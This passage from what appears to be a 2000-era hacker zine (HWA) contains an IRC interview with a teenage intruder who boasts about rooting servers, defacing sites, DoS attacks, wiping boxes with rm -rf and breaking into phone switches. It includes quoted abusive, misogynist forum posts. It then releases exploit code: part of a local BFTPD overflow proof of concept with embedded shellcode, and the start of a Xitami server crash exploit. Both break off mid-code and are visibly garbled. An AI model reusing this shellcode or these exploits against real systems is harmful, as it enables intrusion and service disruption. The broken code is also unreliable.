hack [17:16] <[HWA]> lol [17:16] ah [17:17] *** [HWA] sets mode: +o Kr_D [17:17] *.*.???okyo.??.jp [17:17] my favourite is *.???.xx.jp [17:17] <[HWA]> what OS was it running on? i note the iis in there and think NT but ... [17:17] it rules [17:17] they are running al lil' bit of everything [17:17] NT / SOlaris / IRIX / HP-UX / BSDI / RH6.2 [17:17] blah blah blah [17:18] <[HWA]> well what OS was the box you owned running? do you target any particular OS or what [17:18] <[HWA]> do you use other peoples scripts or write your own exploits/find your own holes? [17:18] rome is running Solaris [17:18] heh [17:18] it depends [17:18] <[HWA]> did you back door them or just do hit and run hacks? [17:19] i own them [17:19] i don't deface usually [17:19] <[HWA]> do you use the boxes for DoSing? ie: install trinoo or anything on these boxes? [17:19] i have defaced two sites this week even [17:19] (for u) [17:19] heh [17:19] <[HWA]> don't say that [17:19] <[HWA]> be more general [17:19] haha [17:19] <[HWA]> for media attention [17:19] DoSing is so lame [17:19] <[HWA]> =) [17:20] <[HWA]> yes but it is still very prevalent on the net, so you never packet? [17:20] <[HWA]> have you EVER packetted anyone? [17:20] i packet when i want a channel [17:20] <[HWA]> I have in my early days. [17:20] or when i need to get something down to be able to spoof it [17:20] <[HWA]> but DoSing commercial sites etc then is lame? [17:20] 's ip [17:20] <[HWA]> ok [17:20] <[HWA]> makes sense [17:20] i did it once, to try [17:21] <[HWA]> whats your opinion of say, mafiaboy? [17:21] i DoS regulary to get bot's away [17:21] heh [17:21] but when i dos [17:21] i use my own tools [17:21] make it a lil' more eleet [17:21] <[HWA]> what do you think of last sunday's 0wn4ge of EFnet? [17:21] i didnt notice ity [17:21] <[HWA]> by Z----- and GG----- [17:22] heh [17:22] it's lame [17:22] really lame [17:22] <[HWA]> it happened sunday morning [17:22] there's no meaning at all to destroy stuff [17:22] <[HWA]> they did it to protest mafiaboy and shadowknight's incarceration [17:22] if i crash a box, it's because i hate the admin [17:22] who is that mafia boy? [17:23] i read a lil about him in hwa.hax0r.news [17:23] <[HWA]> how do you crash the box? forkbombs or something more destructive [17:23] ./own.sh [17:23] and when your root on the box [17:23] <[HWA]> he took out some major sites like yahoo.com and i think cnn.com using mstream [17:23] rm -rf [17:23] heh [17:23] i don't like packed kiddies [17:23] or IRCWarriors(tm) [17:23] <[HWA]> m_____ came up with the idea for mstream, its loosely based on tfn2k [17:24] it's nicer to have yahoo.com [17:24] then having crashed it [17:24] <[HWA]> when you deface a site do you have a message or is it just for the sake of recognition? [17:24] <[HWA]> what name are you trying to get out to the people? [17:24] <[HWA]> and why? [17:24] its for recognition [17:24] BeC [17:24] <[HWA]> are you worried about being busted? [17:24] The binary equipment corporation [17:24] yes [17:24] <[HWA]> you are in Sweden correct? [17:25] of cause i am [17:25] NO [17:25] WHO THE PHUCK SAID THAT [17:25] heh [17:25] i'm from scandinavia [17:25] <[HWA]> maybe i'm conf00zed [17:25] <[HWA]> ah ok [17:25] thats all you need to know [17:25] <[HWA]> good nuff [17:25] muff muff [17:25] <[HWA]> the point was what are the computer laws like in your country? [17:25] mean ones [17:26] <[HWA]> aside: how do you say greetings and props in scandanavian? [17:26] thy shalt not 0wn(r) #phrack 0x7d0-0x7d9 [17:26] computahz [17:26] <[HWA]> aside: teach me some werdz [17:26] i usually say: "hellauw" [17:26] <[HWA]> the laws are stringent then like the U.S [17:26] or "hi" [17:26] <[HWA]> haha [17:27] <[HWA]> hi? thats a strange word [17:27] yeah [17:27] <[HWA]> here we say garshnuggeen [17:27] <[HWA]> rofl [17:27] okey [17:27] <[HWA]> are u a smartass would you say? [17:27] a smartass [17:27] <[HWA]> [17:27] smartass = unknown calss [17:28] (it rythmes, whoii) [17:28] <[HWA]> do you have a message for the scene or general netizens? [17:28] class even [17:28] <[HWA]> nod [17:28] BeC is god? [17:28] <[HWA]> ok [17:28] good even [17:28] heh [17:28] <[HWA]> and why did you choose 'BeC' as the group name? [17:28] <[HWA]> there is a story behind it no? [17:28] i saw it in a movie [17:28] "takedown operation" [17:28] <[HWA]> which movie [17:29] <[HWA]> i haven't seen that, the mitnick movie? [17:29] it's based upon mitnicks lil adventures [17:29] <[HWA]> its not released in North America yet [17:29] back in the 90;s [17:29] they can't use DEC for (c) reasons [17:29] <[HWA]> they have no release date either, computers show no street date. [17:29] so they choosed to call DEC BEC [17:29] digital -> binary [17:29] heh [17:29] it sounded nice [17:29] <[HWA]> nod [17:29] nope [17:29] it's been out for many months [17:29] <[HWA]> if you see it let me know [17:30] <[HWA]> yes but not here [17:30] ok [17:30] <[HWA]> it was released in France i believe at a film festival [17:30] <[HWA]> do you code? [17:30] an yur from? [17:30] i code [17:30] <[HWA]> I'm from England i'm located in Canada presently. [17:31] <[HWA]> :) [17:31] heh [17:31] <[HWA]> how long have you been on the net, did you ever BBS? [17:31] <[HWA]> did you ever run a BBS? [17:31] i'v been on the net since 96 [17:31] i still BBS [17:31] <[HWA]> how old are you? [17:31] <[HWA]> do you wardial? [17:31] i'm 17 [17:31] soon 18 [17:32] no, i \/\/4rd4yl [17:32] <[HWA]> how about telephone phun? do you phreak? [17:32] i am a phreak [17:32] and i phreak [17:32] <[HWA]> trunk seizing is phun [17:32] i reverse enginered a ITU-T node [17:32] <[HWA]> what is the tone to seize a trunk in Scandinavia? its 2600 in the U.S and North America [17:32] me and a friend drove up to the local switching station [17:33] <[HWA]> what did you do with it? this is the one located near ur house? [17:33] it's two metres high and 40cm deep [17:33] i have it right behind me [17:33] to watch [17:33] heh :) [17:33] i love phones [17:33] i have done so much shit with phones [17:34] <[HWA]> note: dear repairman this phone is out of service please replace it we need a new coin drop mechanism [17:34] i can do whatever i want to whoever i want in seeden [17:34] <[HWA]> sweden? [17:34] <[HWA]> you own switches? [17:34] darn [17:34] oh yeah [17:34] <[HWA]> what is the tone you didn't answer [17:34] <[HWA]> 3144? [17:34] huh? [17:34] <[HWA]> to seize a trunk [17:35] <[HWA]> its 2600hz in NA [17:35] i don't do that phreaking stuff [17:35] <[HWA]> ah [17:35] no b0xing technique [17:35] <[HWA]> how then do you own the equipment? [17:35] i hax0rized them [17:35] <[HWA]> how do you access the internal networks? [17:35] with my evil mind [17:35] i find their "secret" number [17:35] thsi si quite phun actually [17:35] <[HWA]> dialup and social engineering? [17:35] they are smart them bastahs [17:36] <[HWA]> when you connect to the net what method do you use? [17:36] you knwo taht there are numbers wich costs liek "Ł2" a minute to call [17:36] <[HWA]> do u connect direct from home? [17:36] <[HWA]> nod [17:36] they have all their evil stuff on such numbers [17:36] where noone wardial [17:36] <[HWA]> aha [17:36] but i found out [17:36] <[HWA]> so how do you find these without incurring charges? [17:36] and by cheer luck [17:37] i found a number with a kewl thing [17:37] <[HWA]> ? [17:37] a support line of somekind [17:37] i engineered them [17:37] <[HWA]> its kinda vague [17:37] they gave me a number to a support line for phoneswtiching troublke [17:37] <[HWA]> what is the software that controls the switches called? [17:37] i called them up [17:37] Local 7 [17:37] <[HWA]> aka Cosmos [17:38] <[HWA]> what does it run on? [17:38] Local 7 [17:38] <[HWA]> (just curious) [17:38] <[HWA]> do you know what the hardware is? [17:38] ISDN switches from ericsson [17:38] <[HWA]> ericsson! [17:38] they use ITU-T standard shyt [17:38] (CCiTT-7) [17:39] <[HWA]> do you do conference calls? [17:39] nope [17:39] <[HWA]> 'confs [17:39] <[HWA]> have you ever? [17:39] noone wants to talk w/ me [17:39] <[HWA]> hrm what about prank calling [17:39] i have back in 97 [17:39] i'v done that [17:39] <[HWA]> most phreaks seem to go thru a conf stage and prank calling stage [17:39] i'v done alot with phones like i said [17:39] <[HWA]> some never grow out of it [17:40] <[HWA]> so you're 17 now you were how old when you started? [17:40] <[HWA]> 12 [17:40] 12 [17:40] when i was young and naive [17:40] and evil [17:40] i was after power, not knowledge [17:40] <[HWA]> what was your first home computer? or did you use school/elsewhere's equipment first? [17:40] TSR 180 [17:40] <[HWA]> like what got you into computers to begin with? [17:40] my brothers box [17:40] <[HWA]> Wargames? [17:41] <[HWA]> :) [17:41] i think it was 85 [17:41] 87 we got a c64 [17:41] <[HWA]> did you play games or code straight away? [17:41] and 89 an amiga 5000 [17:41] 500 [17:41] eveb [17:41] i played alot [17:41] <[HWA]> pirated? [17:41] yes [17:41] i cracked codes [17:41] for levels [17:42] so i could finnish the game faster [17:42] and stuff [17:42] <[HWA]> what about the games themselves, crack any copy protection? [17:42] nope [17:42] i support the amiga scene [17:42] supported even [17:42] <[HWA]> did you ever get into the pirate scene at all, courier etc or anything ? [17:42] no cracking of codes [17:42] nope [17:42] <[HWA]> ok [17:42] <[HWA]> many do/did [17:43] i was only interested in playing [17:43] <[HWA]> so you first got onto the internet in 1996? [17:43] and controling the box [17:43] <[HWA]> what OS were you running then? [17:43] no, that was in 95 [17:43] Windows 3.11 [17:43] from my school [17:43] <[HWA]> ok 1995. did you run ibm clone and windows? [17:43] <[HWA]> what OS do you run now? [17:43] <[HWA]> Linux? [17:43] i owned an amiga1200 then [17:44] running Amiga OS 3.1 [17:44] i think [17:44] <[HWA]> Minix was available for the Amiga or Qnix [17:44] and sucked [17:44] <[HWA]> I think there is even a linux for Amiga, not sure [17:44] <[HWA]> possibly coherent also [17:44] tehre are many [17:44] <[HWA]> nod [17:44] Turbo/falcon/redhat [17:44] <[HWA]> do you use a unix variety now though? [17:44] <[HWA]> or still use windows mainly? [17:44] i only use unix [17:45] <[HWA]> which flavour? [17:45] i HATE windows [17:45] and will never use it [17:45] <[HWA]> what about X Windowss [17:45] solaris/FreeBSD [17:45] <[HWA]> -s [17:45] CDE [17:45] <[HWA]> whats CDE? i should probably know but i'm blank on it [17:45] Cumm0nd3zk70p env4yr0m3n7 [17:45] <[HWA]> ah yea [17:45] <[HWA]> ok [17:45] it's HP's/SGI's/Sun's own version of MWM [17:46] looks and feels like mwm [17:46] <[HWA]> what do you want BeC to do, what is BeC planning to do in the future? [17:46] i want to "be nauhty at tsutomus sight" [17:46] by owning ariel.sdsc.edu [17:46] and not letting him access it [17:46] <[HWA]> are you interested in computer security as a possible area of work or do you work in compsec at any level now? [17:47] heh [17:47] <[HWA]> why target shimomura, because he owned mitnick? [17:47] i think i'll prolly end up working as a unix admin somewhere [17:47] he did it for the money [17:47] <[HWA]> is mitnick an idol of yours? [17:47] i like his style [17:47] <[HWA]> yes and the fame [17:47] he didnt do anything special [17:47] but he did alot [17:47] <[HWA]> mitnick is a net/phreak addict [17:47] like, back in teh 80;s [17:51] *** Disconnected [18:00] *** Rejoined channel #INTERVIEW_BeC [§] Channel [ #INTERVIEW_BeC ] Modes [ +k ] [18:00] <[HWA]> [17:48] <[HWA]> do you have any experience with radios like mitnick (and myself) do? ie:ham gear? [18:00] <[HWA]> [17:48] <[HWA]> example: packet radio or 2m/440cm repeaters etc [18:00] <[HWA]> [17:48] <[HWA]> licensed or not. [18:00] <[HWA]> [17:48] <[HWA]> never get into that? [18:00] <[HWA]> [17:49] <[HWA]> you can phreak and access the net using ham equipment, i've irc'd on packet radio with a hand held radio and tnc [18:00] <[HWA]> [17:49] <[HWA]> hooked to a freebsd box [18:00] hmmss [18:00] <[HWA]> ./. [18:01] <[HWA]> mitnick is a ham radio op thats why i ask [18:01] <[HWA]> he was hoping to get his license back after his release from jail i dont know if he was allowed it or not [18:01] ok [18:01] <[HWA]> i wrote an article on it. [18:02] <[HWA]> we're pretty much nearly ready to wrap up here i think anyway [18:02] <[HWA]> unless you have much more to say [18:02] nope [18:03] <[HWA]> I don't have much in the way of questions since BeC is relatively new [18:03] no radio [18:03] i would like to know thou [18:03] how to play w/ radios [18:03] hmmss [18:03] is he allowed to use hamradios ? [18:03] ok [18:03] i hope he will come online soon [18:03] and join #hwa-security [18:03] os i can ask him stuff [18:03] about tsutomu [18:03] so that i can defeat him [18:03] 'MWAHAHAHAHAHHAHA [18:03] <[HWA]> not sure [18:03] i dono [18:03] ask me stuff and i'll answer [18:03] heh [18:03] june 2000 [18:03] not sure? [18:03] <[HWA]> dunno what to ask, i'm questionless :( [18:04] ask me if i have a glass of water [18:04] <[HWA]> what about June 2000 [18:04] bec was created then [18:04] <[HWA]> ah [18:04] <[HWA]> so backtracking , what has BeC done since its inception? [18:05] <[HWA]> and how many members? or is it a front group for one man? [18:05] ok, so where done then [18:05] let's talk about mafiaboy [18:05] <[HWA]> pretty much [18:05] we are 3 [18:05] i "think" [18:05] <[HWA]> why 'think'? [18:05] and we have done notjing [18:05] <[HWA]> an undecided member? [18:05] i havent heard or seen one of them for two months [18:05] i think he is either dead or busted [18:05] <[HWA]> but you are serious on targetting Tsutomu's computers or is that just a pipe dream? [18:05] "the CC# guy" [18:06] <[HWA]> busted [18:06] it's a pipe dream [18:06] <[HWA]> hrm [18:06] <[HWA]> he from same area or another country? [18:06] he's from the us [18:06] <[HWA]> what about the other member? [18:06] <[HWA]> can you say nicks? [18:06] i don't want to talk about other ppl [18:06] heh [18:06] <[HWA]> ok [18:06] for understandable reasons [18:07] ok, now [18:07] Mafiaboy [18:07] <[HWA]> we're done then thanks for talking with us about BeC. [18:07] <[HWA]> mafiaboy, what about him [18:07] yeah [18:07] that is what i am asking [18:07] *** [HWA] is now known as nobracket [18:07] what about him [18:08] what has he done that is so cool [18:08] he was busted for distributed denial of service attacks on major commercial sites [18:08] the names of which escape me at the moment [18:08] yuck [18:08] he had hacked root in order to run mstream on them [18:08] he probably thinks that is cool [18:09] i believe 100 or so roots [18:09] that is nothing [18:09] wasted (imho) on a ddos net [18:09] he was probably just a script kiddie [18:09] he held down these sites for 15 hrs or so and bragged about it openly on irc [18:09] i mean, finding 100 [18:09] boxes isnt that hard [18:09] this was logged and sent to vetesgirl and i also got a copy and published the logs [18:09] i hold on to my sites for life [18:10] girl? [18:10] GIRL? [18:10] ever come across a honeypot? [18:10] is she goodlooking?` [18:10] yes vetesgirl she wrote 'vetescan' among other things [18:10] i want her [18:10] heh [18:10] I don't know she could look like dianora for all I know [18:11] (ROFL) [18:11] or she could look like,.. nice [18:11] so, what did mafiaboy say to her, [18:11] > >[Dianora ) I want it back [18:11] > >[VetesGirl ) ur a fucking liar [18:11] > >[VetesGirl ) don't accuss me of shit until u have the facts dear [18:11] > >[VetesGirl ) I don't take channels [18:11] > >[VetesGirl ) and had no fucking part in html [18:11] > >[Dianora ) you are on #html which was taken [18:11] > >[VetesGirl ) I am there legit [18:11] > >[VetesGirl ) i was invited and op'd [18:11] > >[VetesGirl ) I had no part in a take [18:11] and what channel [18:12] heh [18:12] dionara = mafiaboy i reckon [18:12] dianora is an irc oper she codes ircd [18:12] ok [18:12] vetesgirl's site is http://www.self-evident.com/ [18:13] so, what did mafiaboy say then [18:13] briefly [18:13] you never heard of dianora or vetesgirl? [18:13] i'v heard about vetesgirl [18:13] http://www.self-evident.com/refnet_old_news.html [18:13] but not dionara [18:14] so [18:14] did mafiaboy get jail [18:14] or did he get the chair? [18:14] as in "theee chair" [18:14] jail [18:14] bha [18:15] for how lonmg? [18:15] +--------------------------------------- [18:15] | mafiaboy <~guest@www.oaklandathletics.com> (Internic Commercial) [18:15] ¦ ircname / ./slice 0 cnn.com 22 80 [18:15] ¦ server / irc.mcs.net ([192.160.127.97] MCSNet Services - [18:15] (312)803-MCS1) [18:15] +-------------------------------------------------- [18:15] and how did they bust him [18:15] many questions [18:15] http://www.self-evident.com/exploits/vetes [18:15] http://www.self-evident.com/exploits/vetes [18:15] check it [18:15] ok [18:15] those are the logs [18:16] she busted him? [18:16] evil girl [18:16] i don't like whiteruss [18:16] http://users3.cgiforme.com/vadia/cfmboard.html [18:16] or cyphex [18:16] heh [18:16] how could they trace him [18:16] i dont like a lot of people but play the devils advocate and mr noncomittal [18:17] heh didn't clean up after dinner? [18:17] you see [18:17] that and also it was rumoured someone narqed him out [18:17] now he's "tounting" enslaved [18:17] please kick him [18:17] witch reason KrD [18:17] it would make me really happy [18:17] :) [18:18] or D0S him [18:18] and blaim mafiaboy [18:18] his message was posted by mafiaboy, posted on April 13, 2000 at 18:56:17 coming from No domain available [18:18] YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE ISNT [18:18] GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER! [18:18] he did packet her site and kept it down for some time [18:18] heh [18:19] i would never doo that [18:19] This message was posted by VetesGirl, posted on April 15, 2000 at 07:05:18 coming from gm.is [18:19] This message is a reply to BITCH IM BACK!! posted from mafiaboy posted at April 13, 2000 at 18:56:17 [18:19] > YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE [18:19] ISNT GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER! [18:19] #1 if it is you, you are proably pr [18:19] shit [18:19] 1 if it is you, you are proably pretending that u didn't get caught so you can get your ass out of trouble and you are proably now a ci (confidential informant) [18:19] #2 Nark?? After the fact maybe You were on efnet msging everyone you could about the attacks and even msg'd your enemies (not a real bright move) and were putting on DoS shows in #!TNT (takes brains), lets see FBI heard about you on the 9th and the news was [18:19] posted on my page on the 13th I didn't come in first DAMN! [18:19] #3 Facts are correct you were o [18:19] on dsuper i remember you back in those days and the logs are true. [18:19] #4 Threaten all you like hun i know how it is and can say been there done that. Why do you packet? does it make you feel like a man, you gain respect from other lil boys who are just like you? You get to be SOMEBODY on efnet for a day wooohoo how leet [18:19] I honestly feel sorry for you. [18:19] -=- [18:20] http://abcnews.go.com/sections/tech/DailyNews/webattacks000418.html [18:20] no [18:21] you might aswell invite #linux.se [18:21] I let almost ANYONE in on PROBATION [18:21] if they suck they get the boot [18:21] he p33rs me [18:21] so far i see nothing from him [18:21] but thats my problem' [18:21] heh [18:21] well, he kicked himself [18:21] so, i'm satisfied [18:21] i doin't understand that someone [18:21] can be so famous for dosing sites [18:22] that is so lame [18:22] Mafiaboy and the 15-year-old claimed credit for attacking [18:22] not only CNN.com but also E*TRADE and several [18:22] smaller sites. Mafiaboy also shared technical information [18:22] that only someone involved in the attacks would know, [18:22] Lyle said. [18:22] i mean, if i would (and i can) relay ALL calls [18:22] from sweded to you [18:22] “Mafiaboy was saying ‘What should I hit next? What [18:22] should I hit next?’ and people on the channel were [18:22] suggesting sites, and Mafiaboy was saying, ‘OK, CNN,’” [18:22] would i get famous [18:22] NO [18:22] A subscriber called “Mafiaboy” previously held two [18:22] accounts with Delphi Supernet, a Montreal Internet [18:22] service provider that Toronto-based ISP Internet Direct [18:22] bought last year. [18:22] The accounts were closed in March 1998 because [18:22] Mafiaboy violated subscriber policies, but Internet Direct [18:22] would not say what the violations entailed. [18:22] hahaha [18:22] i thought he was from Montreal [18:22] hrm [18:22] heh [18:23] Investigators were able to trace the attacks to Mafiaboy [18:23] by examining the log files of a computer at a University of [18:23] California at Santa Barbara research lab, which was [18:23] among those used to attack the CNN.com site. [18:23] The Royal Canadian Mounted Police is expected to [18:23] announce the arrest in a press conference Wednesday at [18:23] 10:30 a.m. ET. The Justice Department and the FBI, [18:23] which assisted in the investigation, also are expected to [18:23] make a statement afterward. [18:23] heh [18:23] i remeber that was watching the conference on CNN [18:23] it was boring [18:24] if i would get busted for everthing i'v done [18:24] i would be hunted like mitnick [18:24] and more famous [18:24] we (hwa) also staged a massive phake media conference and opened up a chat channel called #mediaevent did you read about that? [18:24] mafiaboy or his "friend" showed up. [18:24] nope [18:24] heh [18:24] its in one of the zine issues [18:24] the logs [18:25] quite funny, wired was going to do a story on it but later declined [18:25] can you dcc a .gz with the lates issue? [18:25] since it was of course a hoax [18:25] i'm lacy [18:25] hmms [18:25] i can dcc a zip [18:25] i'v been thinking about this for 4 minutes [18:25] and [18:25] no, gz [18:25] but if u want gz no prob [18:25] sec [18:25] chill even [18:25] just "be there" [18:26] and do absolutley nothing [18:26] you can be a underground rumour mill informer [18:26] :-) [18:26] heh [18:26] sure [18:26] i can start rumors ;) [18:26] ok, well [18:26] sure [18:26] :) [18:26] where to direct to? pop is broken right now [18:26] :( [18:26] do i get op on #hwa-security? [18:27] those webbmails are quite good acctually [18:27] done [18:27] ok [18:28] i'm planning to setup a cpt account @sun.com [18:28] krd@sun.com ,.. yumme [18:28] lol [18:28] heh [18:28] set one up for me too [18:28] nophear@sun.com [18:28] ;) [18:28] ^[@sun.com :)= [18:28] fwd to nophear@hwa-security.net [18:28] (not bracket) [18:28] are you on there? [18:28] and they wil trace you in five seconds [18:28] you owned sun? [18:29] i was [18:29] haha [18:29] www.sun.se [18:29] cool [18:29] they sent me a copy of solaris [18:29] for "my trouble" [18:29] i liked it [18:29] i owned some NS and lost em, pissed me off the didnt remove the backdoors they shutdown the servers completely [18:29] never came back up so must have changed ips [18:29] weird [18:29] i used to own three ISP;s in sweden [18:29] .jp boxen [18:29] *.?? telia.com and [18:29] ever do any carding? [18:30] swipnet.se [18:30] no carding [18:30] until algonet busted me [18:30] that was april 97 [18:30] :) [18:30] i dialed into them [18:30] ok [18:30] what happened in the bust? [18:30] how did they catch ya? [18:30] they called me up [18:30] i used my first account [18:30] guest23 [18:30] thats how i got in [18:30] haha [18:31] guest??/@???net [18:31] then rooted them? [18:31] and i wanted to try my new backdoor [18:31] so i called them up [18:31] saw lpc: down [18:31] and the minute later the phone rang [18:31] what scanner if any do you use? any other tools you use or recommend to wannabe hax0rs? [18:31] and asked me "do you own a computer with a modem" [18:31] lol [18:31] i like, died [18:31] there are no wannabee hax0rs anymore [18:31] "my dad does" [18:31] they are all windows users [18:31] think not? [18:32] i think there are some [18:32] i started as a amiga user [18:32] everybody novadays will grow up with GUI only [18:32] and no eleet stuff [18:32] i met this kidd thou on a system [18:32] i started on a trs80 but first own computer was a vic20 with 5k memory [18:32] i saw he was a hacker right at once [18:32] so i staled him [18:32] stalked even [18:32] staled? stalked [18:32] ok [18:32] why [18:32] and talked him and said i was the sysadmin [18:32] heh [18:33] later i told the triouth [18:33] haha [18:33] he was only 14 [18:33] abd still owned the net [18:33] their [18:33] he will become something for sure [18:33] he wrote all his shit by hand [18:33] with C [18:33] what do you mean, "he will become something for sure" [18:33] a hacker [18:33] a REAL hacker [18:34] ah so he was skilled and you respect him ok [18:34] no [18:34] did he teach you anything? [18:34] not sure what you're meaning then [18:34] but he was about as good as i was when i was 13 [18:34] still, he knew what he was doing [18:34] what about the scanners/tools? [18:35] nmap [18:35] and /usr/bin/rpcinfo [18:35] /usr/sbin/rcpinfo even [18:35] that is what i use [18:35] have you exploited dns cache poisoning? [18:35] jizz.c [18:35] no [18:35] erect.c [18:35] etc [18:36] friend came up with the concept he was first to do it [18:36] i try not to use exploits [18:36] i want to root the box by hand [18:36] i have me evil trix to get root [18:36] erm [18:36] not here [18:36] brb [18:36] heh [18:36] sorry [18:39] who is zoa? [18:40] [18:38] *** Zoa_Chien (~Michelle@dial-15.kulak.ac.be) has joined #hwa-security [18:40] [18:39] are they STALKING ME [18:40] [18:39] Zoa_Chien, you will NEVER get me [18:40] [18:39] euhm.. Kr_D stoned again ? [18:41] [18:40] but i was evil to kulac.ac.be [18:41] [18:40] hmmss [18:41] [18:40] enjoy ku*.??.be [18:41] [18:40] and enjoy k*.??.be too [18:41] [18:40] ok [18:41] Zoa_Chien is ~Michelle@dial-15.kulak.ac.be * sempronia [18:41] Zoa_Chien on #hwa-security [18:41] Zoa_Chien using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE [18:41] [18:40] are you after me? [18:42] [18:40] you know you can never capture me [18:42] [18:41] Krd.. i don't even want to look after you :-) [18:42] i'll include this too [18:42] heh [18:42] yeah [18:42] heh [18:43] shit [18:43] everytime [18:43] i use rixtele.com as ISP [18:43] i feeel, like someone is watching me [18:43] cause sometime [18:43] the modem disconnects when i trie to haxor [18:43] and i have allready got busted once for owning kevin.rixtele.com [18:43] by rixtele.com [18:43] Kr_D is ~k0rrupt@213.x.x.x * Korrupt@sweden [18:43] Kr_D on @#chat-along.with-setvie #hwa-security @#INTERVIEW_BeC #hwa.hax0r.news #it99 [18:43] Kr_D using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE [18:43] it feels like some site has contacted rixtele.com [18:43] setvie [18:43] ;) [18:43] and now they are sniffing my ass [18:44] lol [18:44] no, i'm serious [18:44] sniffing your ass like the DOGS they are! [18:44] i got a REALLY bad feeling [18:44] about them [18:44] hrm [18:44] ditch em [18:44] yeah [18:44] i only use them sometime [18:44] like _now_ [18:44] hey you think a dvd player lef on pause overnight will burn the cd? [18:44] heh [18:45] dono [18:46] ? [18:46] * Cruciphux is back. hi. ..(2h19m50s) [18:47] [18:46] Zoa_Chien [18:47] 18:46] Zoa_Chien [18:47] [18:46] whoohooo [18:47] [18:46] yes ? [18:47] [18:46] are you stalking me [18:47] [18:47] yes :-) [18:47] brb [18:50] http://www.ntsource.com/~xxxxxx/efnet/ [18:56] [18:54] ok [18:56] [18:54] so what are you wearing? [18:56] [18:54] nothin' much [18:56] [18:54] mmmm [18:56] [18:55] want to see mi pic ? [18:56] [18:55] i want to [18:56] [18:55] i run windows on a sparc ultra10 [18:56] [18:55] yeah me too [18:56] [18:55] if you promise yyou are a redhet with firm tits [18:56] [18:55] its me and my sister [18:56] [18:55] readhead even [18:56] [18:55] lol [18:56] [18:55] http://www.securax.org/xx/xxxo/ [18:58] [18:56] you look injured [18:58] [18:57] yeah we dont need that shit [18:58] [18:57] the door is over there -> [18:58] [18:57] dmamit [18:58] [18:57] hold up [18:58] [18:57] *** Cruciphux sets mode: -o+b Zoa_Chien *!*Michelle@*.ac.be [18:58] [18:57] *** Zoa_Chien was kicked by Cruciphux ((ar) sick puppy) [19:04] *** Cruciphux has quit IRC (Ping timeout: 360 seconds) [19:04] *** Disconnected See more from the BeC interviews and history in future issues. Session Time: Sun Oct 29 00:00:00 2000 Cruci @HWA 328.0 [HWA] Releases: eth0 releases sscan2k-pre6 scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hwa-security.net http://hwa-security.net/hot.html Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases. http://hwa-security.net/hot-new/sscan2k-pre6.HWA.tar.gz @HWA 329.0 [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hwa-security.net http://hwa-security.net/hot.html http://hwa-security.net/hot-new/HWA-w00p-local.c /* RELEASED BY Cruciphux HWA-SECURITY.NET */ /* w00p.c (HWA-w00p-local.c) */ /* coded: Oct 25th */ /* released Oct 29th */ /* REMOTE exploit based on w00p.c forthcoming */ #include #include #include #define ADDRS 54 /* GREETZ TO JBUST, SKRIPT KIDDIES(I WUZ ONE), Enslaved, AND HWA-SECURITY*/ /* VENGLIN, ETH0, CRUCIPHUX, ***non crippled version***. Have fun. /* Jbust is off of IRC h3h3 anyhow l4m3rz chroot() code */ char linuxcode[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27\xcd" "\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb" "\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e" "\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09" "\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88" "\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89" "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31" "\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x69\x6e" "\x30\x73\x68\x31\x2e\x2e\x31\x31"; int main(argc, argv) int argc; char **argv; { char buf[BUFSIZ], *p; long ret = 0xbffff960, *ap; int noplen; int align, i; if (argc != 3) { fprintf(stderr, "Just_For_you: %s ie ./HWA-w00p test 1024\n", argv[0]); exit(0); } align = atoi(argv[1]); memset(buf, 0x90, 49); buf[50] = '\0'; strcat(buf, linuxcode); ret += atoi(argv[4]); for(i=0;i. (sorry becouse of my poor style) This is part of Readme.txt: "You want ROCK-SOLID industrial-strength STABILITY? Xitami will run for years without maintenance. We use a special memory management library to detect and flush-out memory leaks." -- I don`t think so... The same version of Xitami Ftpserver is vulnurable to con/con bug, just type cd con/con and it will crash the server... Greets to my friends from anonyunity, hwa-security and Cyberx- You know who you are ;] Also thanks to xfer ( sam wiesz najlepiej za co :> ) and superluck (becouse of helping me:>) :>, and k.g :[ Poland, 2000. forrest@hq.hack.pl forrest@hwa-security.net comments about this or any other code to contact@hwa-security.net - Cruciphux RELEASED BY Cruciphux http://hwa-security.net/ OCT 27 2000 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; char *cgistr; char buffer[1024]; int count=0; int numin; char get[1024]; char *buff[50]; buff[1] = "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 